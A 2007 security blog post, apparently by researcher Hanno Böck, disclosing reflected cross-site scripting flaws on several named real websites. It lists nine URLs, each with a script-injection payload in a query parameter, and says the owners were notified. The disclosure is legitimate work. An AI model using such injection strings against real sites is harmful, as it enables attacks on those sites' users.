Search

About me

Johannes (Hanno) Böck
mail: hanno@hboeck.de
jabber: hanno@hboeck.de
gpg: BBB51E42
ssh: RSA, ECDSA


Hanno on Twitter
Hanno on identi.ca

Impressum

schokokeks.org



Atheist

Twitter/identi.ca

hanno: geh jetzt los zum #linuxtag

hanno: @_tillwe_ in schwierigen fällen und falls wichtig: altes windows + altes office organisieren und in virtueller maschine installieren

hanno: @_tillwe_ erstmal alternativsoftware probieren - libre/openoffice, gnumeric, calligra - irgendeins wird vermutlich einen importfilter haben

hanno: RT @moglimoglimogli: Was für eine Gesellschaft ist das, in der ein Vorhängeschloss !!! (an einer Brücke) ein Symbol für #Liebe ist ? #sperr…

hanno: Falls ihr noch an Clicktivism glaubt könntet ihr hier die Petition für Netzneutralität unterstützen http://t.co/NfcNlcFKz4

Anzeigen

Events

22.05 - 25.05 - Linuxtag
30.05 - 02.06 - GPN13 (8 Days)
04.07 - 07.07 - PQCrypto (43 Days)
05.07 - 07.07 - SIGINT (44 Days)
31.07 - 04.08 - OHM13 (70 Days)
01.10 - 02.10 - Open Access Tage (132 Days)
My pages
Picture gallery

Archives

Categories



All categories

Feeds

Tags

Creative Commons

CC0
Unless noted otherwise, all content is CC Zero / public domain

Cross Site Scripting all over the internet

Friday, March 30. 2007, 14:58
It's terrifying how many sites there are out there with XSS-issues.

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>


Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.

Napster and MPAA still unfixed.
English, Security, Webdesign | Comments (2) | Trackbacks (0)
Defined tags for this entry: , ,
Related entries by tags:

Trackbacks
Trackback specific URI for this entry

No Trackbacks

Comments
Display comments as (Linear | Threaded)

Du solltest dich mal mit anständigeren Attack-Vektoren beschäftigen als mit dem Kinderkram. :D

BTW: Die Hintergrundfarbe für die Captchas kannst du deinem Layout auch anpassen im Plugin. ;)
#1 Alex (Link) on 2007-04-29 20:30
Das ist doch das passende für Hackr Hanno:
http://www.cs.washington.edu/education/courses/cse490k/CurrentQtr/projects/project3.html

;)
#2 Alex (Link) on 2007-05-31 13:48

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.